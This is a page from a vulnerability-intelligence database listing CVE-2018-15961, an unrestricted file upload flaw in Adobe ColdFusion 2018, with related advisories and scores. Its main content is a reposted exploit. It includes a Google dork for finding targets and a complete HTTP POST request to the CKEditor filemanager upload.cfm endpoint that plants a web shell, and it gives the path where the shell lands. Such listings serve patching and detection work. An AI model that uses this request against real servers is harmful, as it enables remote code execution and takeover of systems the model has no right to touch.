Vulners
Lucene search
Adobe ColdFusion 2018 - Arbitrary File Upload Vulnerability
| Reporter | Title | Published | Views | Family All 39 |
|---|---|---|---|---|
 | Adobe Coldfusion 11 CKEditor Arbitrary File Upload Exploit | 10 Jan 201900:00 | – | zdt |
 | Exploit for Unrestricted Upload of File with Dangerous Type in Adobe Coldfusion | 3 Oct 202123:31 | – | githubexploit |
| Exploit for Unrestricted Upload of File with Dangerous Type in Adobe Coldfusion | 30 Jun 202108:15 | – | githubexploit |
 | Adobe ColdFusion CKEditor file upload | 25 Sep 201800:00 | – | attackerkb |
| CVE-2018-15961 | 25 Sep 201800:00 | – | attackerkb |
 | The vulnerability of the ColdFusion interpreter lies in the lack of restrictions on file uploads, which allows attackers to execute arbitrary code. | 15 May 202000:00 | – | bdu_fstec |
 | CVE-2018-15961 | 12 Nov 201818:53 | – | circl |
 | Adobe ColdFusion Unrestricted File Upload Vulnerability | 3 Nov 202100:00 | – | cisa_kev |
 | Adobe ColdFusion Arbitrary File Upload Vulnerability | 12 Sep 201800:00 | – | cnvd |
 | Adobe ColdFusion File Upload (APSB18-33) (CVE-2018-15961) | 25 Oct 201900:00 | – | nessus |
10
# Exploit Title: Unrestricted file upload in Adobe ColdFusion 2018
# Google Dork: ext:cfm
# Exploit Author: Pete Freitag of Foundeo
# Reversed: Vahagn vah_13 Vardanian
# Vendor Homepage: adobe.com
# Version: 2018
# Tested on: Adobe ColdFusion 2018
# CVE : CVE-2018-15961
# Comment: September 28, 2018: Updates for ColdFusion 2018 and ColdFusion
2016 have been elevated to Priority 1 due to a report that CVE-2018-15961
is now being actively exploited.
```
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
HTTP/1.1
Host: coldfusion:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/62.0.3202.9 Safari/537.36
Content-Type: multipart/form-data;
boundary=---------------------------24464570528145
Content-Length: 303
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------24464570528145
Content-Disposition: form-data; name="file"; filename="shell_file"
Content-Type: image/jpeg
%shell code here%
-----------------------------24464570528145
Content-Disposition: form-data; name="path"
shell
-----------------------------24464570528145--
```
a shell will be located here http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file
# 0day.today [2018-12-12] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Dec 2018 00:00Current
9.2High risk
Vulners AI Score9.2
EPSS0.94393